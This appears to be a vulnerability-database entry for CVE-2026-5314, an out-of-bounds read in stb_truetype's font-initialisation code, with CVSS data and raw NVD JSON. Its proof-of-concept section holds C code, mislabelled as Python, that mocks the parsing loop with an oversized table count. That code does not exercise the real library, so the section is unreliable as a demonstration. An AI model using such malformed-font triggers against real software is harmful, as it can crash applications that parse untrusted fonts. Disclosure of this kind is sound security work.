CVE-2026-5314

Description

A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:* - VULNERABLE

Nothings stb <= 1.26

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-5314: Out-of-bounds read in stbtt_InitFont_internal
 * This code demonstrates the triggering condition with a malformed TTF header.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

// Mocking the vulnerable structure logic for demonstration
#define STBTT_MAX_OVERHEAD 100

// Simplified representation of the vulnerable function logic
int vulnerable_stbtt_InitFont_internal(unsigned char *data, int fontstart) {
    // In the real vulnerability, specific offsets in the TTF header are trusted blindly
    // without checking if they point within the 'data' buffer bounds.
    
    int numTables = *(uint16_t*)(data + fontstart + 4);
    printf("[+] Parsing %d tables...\n", numTables);
    
    // Vulnerability: Looping or accessing data based on untrusted 'numTables' or offsets
    // without verifying they are within the allocated buffer size.
    for (int i = 0; i < numTables; i++) {
        int offset = fontstart + 12 + (i * 16);
        // This read could go out of bounds if 'data' is small or 'numTables' is huge
        uint32_t tableOffset = *(uint32_t*)(data + offset + 8);
        printf("[+] Reading table at offset: 0x%x\n", tableOffset);
        
        // Simulating the crash/OOB access
        if (tableOffset > 10000) { // Arbitrary bound for simulation
            printf("[!] Potential Out-of-Bounds Read detected at high offset!\n");
        }
    }
    return 1;
}

int main() {
    // Allocate a small buffer to simulate a constrained memory environment
    unsigned char *fake_font_data = (unsigned char *)malloc(1024);
    if (!fake_font_data) return -1;

    // Setup a basic TTF header structure (SFNT version 1.0)
    // Bytes 0-3: SFNT version
    fake_font_data[0] = 0x00; fake_font_data[1] = 0x01; fake_font_data[2] = 0x00; fake_font_data[3] = 0x00;
    
    // Bytes 4-5: numTables (Set to a high value to trigger OOB in loop)
    // Setting a large number of tables to force reading beyond 1024 bytes
    fake_font_data[4] = 0xFF; 
    fake_font_data[5] = 0xFF;

    printf("[*] Triggering CVE-2026-5314...\n");
    vulnerable_stbtt_InitFont_internal(fake_font_data, 0);

    free(fake_font_data);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5314
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5314
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5314/
[4] VulDB https://vuldb.com/cve/CVE-2026-5314
[5] https://gist.github.com/d0razi/cb31a92f3205a4373f19b7da25946848
[6] https://vuldb.com/submit/780558
[7] https://vuldb.com/vuln/354646
[8] https://vuldb.com/vuln/354646/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5314", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:03.810", "lastModified": "2026-04-30T19:36:56.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.26", "matchCriteriaId": "9F48FE8E-19C5-4C38-AB64-1857C491714B"}]}]}], "references": [{"url": "https://gist.github.com/d0razi/cb31a92f3205a4373f19b7da25946848", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/submit/780558", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354646", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354646/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}